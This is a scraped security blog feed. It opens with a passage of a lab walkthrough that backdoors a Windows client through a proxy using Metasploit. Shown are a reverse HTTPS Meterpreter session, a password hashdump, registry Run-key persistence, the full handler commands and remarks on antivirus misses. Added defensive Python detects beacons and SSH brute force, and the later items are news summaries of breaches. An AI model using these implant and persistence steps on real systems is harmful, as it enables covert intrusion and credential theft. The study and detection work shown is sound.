Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM...
[*] 192.168.56.101:43681 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Let's reboot the Smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait.... success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg
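The post notes that on the client only HTTPS connections to the proxy are visible. The proxy itself, however, logs every CONNECT, and an implant waiting for commands polls its handler repeatedly, so the proxy log is where a defender can look. The Python below, an added example that is not part of the original post, groups CONNECT entries by (client, destination) in constructed Squid native-format lines and flags series with regular spacing; the minimum hit count and the interval-regularity threshold are assumptions to tune, and a bare-IP destination on port 443 is noted as an additional indicator.

```python
"""Proxy-log beacon detection, added as an example for this page (not HackerTarget's
code). Groups CONNECT requests by (client, destination) and flags series whose
inter-request gaps have a low coefficient of variation, i.e. machine-regular polling.
The Squid native-format lines below are constructed."""
import re
from collections import defaultdict
from math import sqrt
from typing import Dict, List

# Squid native format: timestamp elapsed client code/status bytes method URL ...
SQUID_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)
IP_PORT_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d+$")


def constructed_proxy_log() -> List[str]:
    """Sample lines: a 5-second beacon from 10.10.10.199, ordinary browsing from 10.10.10.198."""
    lines = []
    base = 1310695741.0
    for i in range(12):  # beacon: every 5 s with a little jitter
        jitter = 0.1 if i % 2 else -0.1
        ts = base + 5 * i + jitter
        lines.append(f"{ts:.3f}   2040 10.10.10.199 TCP_TUNNEL/200 3321 CONNECT 192.168.56.1:443 - HIER_DIRECT/192.168.56.1 -")
    ts = base
    for gap in (1, 30, 2, 120, 5, 60, 3, 200):  # irregular human browsing to one site
        ts += gap
        lines.append(f"{ts:.3f}    310 10.10.10.198 TCP_TUNNEL/200 8812 CONNECT www.example.com:443 - HIER_DIRECT/203.0.113.10 -")
    lines.append(f"{base:.3f}     12 10.10.10.198 TCP_MISS/200 512 GET http://www.example.com/ - HIER_DIRECT/203.0.113.10 text/html")
    return lines


def find_beacons(lines: List[str], min_hits: int = 8, max_cv: float = 0.25) -> List[Dict]:
    """Return suspected beacons: CONNECT series with >= min_hits and regular spacing."""
    by_pair = defaultdict(list)
    for line in lines:
        match = SQUID_RE.match(line)
        if match and match["method"] == "CONNECT":
            by_pair[(match["client"], match["url"])].append(float(match["ts"]))
    alerts = []
    for (client, dest), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        if mean <= 0:
            continue
        # coefficient of variation: near 0 for a timer, well above 0.25 for a person
        cv = sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps)) / mean
        if cv <= max_cv:
            alerts.append({"client": client, "dest": dest, "hits": len(times),
                           "mean_gap_s": round(mean, 1), "cv": round(cv, 3),
                           "bare_ip": bool(IP_PORT_RE.match(dest))})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(constructed_proxy_log()):
        print(alert)
```

Long-lived implants with randomised sleep defeat a pure regularity test, so in practice this is combined with destination reputation and the bare-IP indicator; the point is that a proxy, unlike the client's netstat, keeps the history needed to see the pattern.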

Persistent

Let's improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d 'C:\windows\evil_https.exe'
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM...
[*] 192.168.56.101:55182 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

[Metasploit ASCII art banner]

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/...
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice: the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows 7 Enterprise with "Work Network Settings" (no anti-virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM...
[*] 192.168.56.101:50910 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >

Booya!

Note that neither client system was running any anti-virus; the executable may have been blocked if they had been.

Let's check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let's have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

Corporate networks face a serious threat from this type of attack. The attack traffic is wrapped in SSL, so content filtering will see little unless you are decrypting at the proxy, which is unlikely for most organizations.

By understanding the attack you can then start to discuss and find effective ways to defend against these types of targeted attacks.

The post Backdoor Corporate Networks with Metasploit appeared first on HackerTarget.com.

]]>
TechCrunch Europe hacked https://hackertarget.com/techcrunch-europe-hacked/ Tue, 07 Sep 2010 00:59:53 +0000 http://hackertarget.com/?p=623 Drive by downloads, adobe exploits and a zeus variant trojan that is only detected by 2 of 43 Anti-virus products. This is a good example of current threats that website operators as well as end users should all be aware of, a high profile site gets hacked and poses a significant threat to the end […]

The post TechCrunch Europe hacked appeared first on HackerTarget.com.

]]>
Drive by downloads, adobe exploits and a zeus variant trojan that is only detected by 2 of 43 Anti-virus products.

This is a good example of current threats that website operators as well as end users should all be aware of: a high-profile site gets hacked and poses a significant threat to the end user.

Once downloaded and run, the PDF files exploit a vulnerability and make the system download a version of the ever-so-popular ZeuS Trojan.

According to Trend Micro's Rik Ferguson, the server in question is located in Germany and is hosted by Netdirect - not a stranger to hosting malicious sites.

A few hours ago, TechCrunch tweeted that they "are aware of the (annoying) malware warning about the @TCEurope site", and that they are trying to fix it.

The awkward phrasing makes me think they thought at the time that there was some kind of mistake and not a legitimate warning. The site hasn't been taken down in the meantime, and there is no official update on the situation.

Ferguson warns that the ZeuS variant is currently detected by only 2 out of 43 anti-malware solutions used by VirusTotal, so it's best to avoid the site altogether until they manage to clean its code.

TechCrunch Europe hacked, serving malware


]]>
When Neo Hacked the Latvian SRS Database https://hackertarget.com/when-neo-hacked-the-latvian-srs-database/ Sat, 27 Feb 2010 06:09:38 +0000 http://hackertarget.com/?p=441 Movie plots cross into real life in Latvia where a significant security breach has occurred in the hacking of the Latvian SRS Database. A group of hackers has stirred the nation after hacking into the country's taxation web site and revealing details of the powerful political elite's wages and bonuses. One of the hackers used […]

The post When Neo Hacked the Latvian SRS Database appeared first on HackerTarget.com.

]]>
Movie plots cross into real life in Latvia, where a significant security breach has occurred in the hacking of the Latvian SRS Database. A group of hackers has stirred the nation after hacking into the country's taxation web site and revealing details of the powerful political elite's wages and bonuses. One of the hackers used the name Neo, and has explained his motivations and reasons for the attack to a Latvian current affairs program.

From the Matrix:
Trinity: Hello, Neo.
Neo: How do you know that name?
Trinity: I know a lot about you.
Neo: Who are you?
Trinity: My name's Trinity.
Neo: Trinity... THE Trinity? The one who hacked the IRS D-Base?
Trinity: That was a long time ago.
Neo: Jesus.
Trinity: What?
Neo: I just thought... you were a guy.
Trinity: Most guys do.

To the horror of Latvia’s political establishment, a mysterious group of computer hackers is threatening to expose the incomes of top officials after stealing millions of government tax records.

The group, calling itself the People’s Army of the Fourth Awakening, claimed to have downloaded more than 7.5 million documents, including VAT receipts and income tax returns, from the State Revenue Service (SRS) after exploiting a security loophole on its website.

One hacker used the name Neo, in apparent tribute to the hero of The Matrix science-fiction films, in which a vast system for enslaving humanity is exposed. He or she claimed that the documents revealed the extent of official hypocrisy over belt-tightening reforms introduced as Latvia’s economy reeled under the impact of the global economic crisis. “The purpose of the group is to unmask those who gutted the country,” Neo told the Latvian television current affairs programme Kas Notiek Latvija in an interview posted on its website.

Neo has been hailed as a digital Robin Hood by disgruntled Latvians after posting details from the documents on the internet to contrast the earnings of top officials with cuts experienced by other workers.

Reuters - Latvia web hacker nabbed after baring officials' pay


]]>
BackTrack 4 Release https://hackertarget.com/backtrack-4-release/ Mon, 01 Feb 2010 00:40:56 +0000 http://hackertarget.com/?p=428 In case you missed it, the world's leading penetration testing Linux distribution, BackTrack, has hit version 4.0. A new web site, great video tutorials for those wanting to learn and a complete guide to Metasploit are just a few of the new bits for you to check out. Based on Ubuntu and well tested this […]

The post BackTrack 4 Release appeared first on HackerTarget.com.

]]>
In case you missed it, the world's leading penetration testing Linux distribution, BackTrack, has hit version 4.0. A new web site, great video tutorials for those wanting to learn and a complete guide to Metasploit are just a few of the new bits for you to check out.

Based on Ubuntu and well tested, this is an outstanding release, and we wish the Offensive Security team all the best for 2010.

Download BackTrack now and get cracking with some serious security testing. Explore the Offensive Security and BackTrack websites, and the forums, for guides, tutorials and FAQs.

Real security can only be achieved through awareness, knowledge and some clever tools.

BackTrack became Kali Linux in 2013
Historical timeline available here


]]>
SQL Injection Demystified https://hackertarget.com/sql-injection-demystified/ Mon, 24 Aug 2009 09:35:27 +0000 http://hackertarget.com/?p=372 Darkreading has a great article up on SQL Injection. This form of attack has been around for a long time, and happens because of poor dynamic website coding practices. A simple SQL injection vulnerability can often be exploited to gain full access to the database and / or full control of the database server. Several […]

The post SQL Injection Demystified appeared first on HackerTarget.com.

]]>
Darkreading has a great article up on SQL Injection. This form of attack has been around for a long time, and happens because of poor dynamic website coding practices. A simple SQL injection vulnerability can often be exploited to gain full access to the database and / or full control of the database server.

Several high-profile hacks over the past year, including:

  • Heartland Payment Systems
  • Hannaford Bros.
  • 7-11

all have had one thing in common: they were launched with a SQL injection attack.

Cross-site scripting (XSS) had been the king of Web attack techniques for some time, and for good reason: the ability to steal user credentials, hijack active Web sessions and take action on behalf of a user without their knowledge is particularly nasty. But the classic SQL injection attack has regained the lead as the most popular of Web attacks. Most reported Web breaches in the first half of this year, according to the new Web Hacking Incidents Database (WHID) report, were conducted via SQL injection. And SQL injection is one of the most common vulnerabilities in Web applications today.

To find out more about SQL injection, we have a tutorial to follow that includes explanation and examples. See: SQL Injection Tutorial
Link to article referenced above

Dark Reading - SQL Injection Demystified


]]>
‘Golden Cash’ botnet-leasing network uncovered https://hackertarget.com/golden-cash-botnet-leasing-network-uncovered/ Thu, 18 Jun 2009 11:09:26 +0000 http://hackertarget.com/?p=192 Sometimes reading the news is like reading science fiction. However, this is real and shows how far the criminal underground is progressing when it comes to monetisation of compromised machines. It all starts with malicious scripts being injected into poorly secured and managed web servers. Researchers at security firm Finjan said on Wednesday that they […]

The post ‘Golden Cash’ botnet-leasing network uncovered appeared first on HackerTarget.com.

]]>
Sometimes reading the news is like reading science fiction. However, this is real and shows how far the criminal underground is progressing when it comes to monetisation of compromised machines. It all starts with malicious scripts being injected into poorly secured and managed web servers.

Researchers at security firm Finjan said on Wednesday that they have uncovered an underground botnet-leasing network where cyber criminals can pay $5 to $100 to install malware on 1,000 PCs for things like stealing data and sending spam.

The Golden Cash network, dubbed "Your money-making machine" on its home page, sells access to botnets comprised of thousands of compromised PCs to cyber criminals for custom malware spreading jobs, according to issue 2 of the Cybercrime Intelligence Report for 2009.

Here's how it works: a cyber criminal creates a botnet by hiding malicious code in a legitimate Web site that is used to turn Web surfing PCs into zombies. The code, typically an iFrame, points the PCs to a separate Web site where they are then infected with a Trojan backdoor that reports back to the Golden Cash command and control server.

'Golden Cash' botnet-leasing network uncovered


]]>
Amazon Cloud Service Brute Force https://hackertarget.com/amazon-cloud-service-brute-force/ Wed, 17 Jun 2009 22:28:46 +0000 http://hackertarget.com/?p=167 OSSEC is an excellent open source host-based intrusion detection system. It works on Windows and Linux and detects security anomalies within the system, such as brute force SSH attacks from the Amazon Cloud. It seems that like any web hosting service the Amazon Cloud Web Services are open to exploitation. Of course in this post […]

The post Amazon Cloud Service Brute Force appeared first on HackerTarget.com.

]]>
OSSEC is an excellent open source host-based intrusion detection system. It works on Windows and Linux and detects security anomalies within the system, such as brute force SSH attacks from the Amazon Cloud.

It seems that, like any web hosting service, Amazon Web Services is open to exploitation. Of course, in this post I am not saying that Amazon is attacking, or even that the owner of this slice of the cloud is attacking me; they have likely had their slice compromised and it is now being used to launch those pesky SSH brute force attacks that fill up all our logs.

This popped into my inbox today from one of my ossec sensors:

OSSEC HIDS Notification.
2009 Jun 17 15:53:48

Received From: htarget02->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Jun 17 15:53:47 htarget02 sshd[10047]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:44 htarget02 sshd[10045]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:42 htarget02 sshd[10043]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:39 htarget02 sshd[10041]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:37 htarget02 sshd[10039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:35 htarget02 sshd[10037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:32 htarget02 sshd[10035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root

Here is a good article on securing your AWS instance, including improving your sshd security.
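As an added example (not OSSEC's code, and not from the original post), here is the same frequency-based detection reimplemented in Python over the pam_unix lines from the alert above, grouped per source host. The six-failures-in-120-seconds threshold, the log year and the extra line from 192.0.2.10 are constructed assumptions, not OSSEC's defaults.

```python
"""Sliding-window detector for repeated sshd PAM failures per source host.

Added example, not OSSEC's own code. It reimplements the idea behind the rule
that fired above (many failures from one rhost inside a short window) over
pam_unix lines. Threshold and window are assumed, not OSSEC's defaults.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_YEAR = 2009  # assumed: syslog timestamps carry no year

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"pam_unix\(sshd:auth\): authentication failure;.*\brhost=(?P<rhost>\S+)"
    r"(?:\s+user=(?P<user>\S+))?"
)

# Constructed sample: the lines from the alert above (newest first, as OSSEC
# reports them) plus one unrelated failure (documentation address) that must not trip the rule.
SAMPLE_LOG = """\
Jun 17 15:53:47 htarget02 sshd[10047]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:44 htarget02 sshd[10045]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:42 htarget02 sshd[10043]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:39 htarget02 sshd[10041]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:37 htarget02 sshd[10039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:35 htarget02 sshd[10037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:32 htarget02 sshd[10035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:40:01 htarget02 sshd[9901]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.0.2.10  user=alice
"""

def parse_failures(text):
    """Yield (timestamp, rhost, user) for each pam_unix auth failure line."""
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["rhost"], m["user"] or "?"

def detect_bruteforce(text, threshold=6, window_seconds=120):
    """Return {rhost: total_failures} for hosts with >= threshold failures
    inside any window_seconds span. Events are sorted first, so the
    newest-first order OSSEC uses does not matter."""
    by_host = defaultdict(list)
    for ts, rhost, _ in parse_failures(text):
        by_host[rhost].append(ts)
    hits = {}
    for rhost, stamps in by_host.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[rhost] = len(stamps)
                break
    return hits
```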


]]>
Another mass hack – MSSQL injection compromises 500’000+ web sites https://hackertarget.com/another-mass-hack-mssql-injection-compromises-500000-web-sites/ Sun, 27 Apr 2008 10:40:36 +0000 http://hackertarget.com/?p=47 A simple SQL injection has resulted in more than 500'000 websites being compromised. A javascript injection sends visitors from the hacked websites to other sites containing malware that attempts to infect the client. This is yet another example of simple security errors resulting in mass hacks of websites. The attackers ultimate purpose is the installation […]

The post Another mass hack – MSSQL injection compromises 500’000+ web sites appeared first on HackerTarget.com.

]]>
A simple SQL injection has resulted in more than 500'000 websites being compromised. A javascript injection sends visitors from the hacked websites to other sites containing malware that attempts to infect the client.

This is yet another example of simple security errors resulting in mass hacks of websites. The attackers' ultimate purpose is the installation of trojans onto end user machines. The trojans are then used in bot armies, or for collection of data, passwords and financial accounts via keystroke loggers.

As more and more websites use database back-ends to make them faster and more dynamic, it becomes crucial to verify what information gets stored in, or requested from, those databases, especially where users are allowed to upload content themselves, which happens all the time in discussion forums, blogs, feedback forms and other areas of dynamic websites.

Unless that data is sanitized before it gets saved, it is impossible to control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.

References

--> F-Secure Labs: Details of the hack
--> SANS ISC Infofec forum article


]]>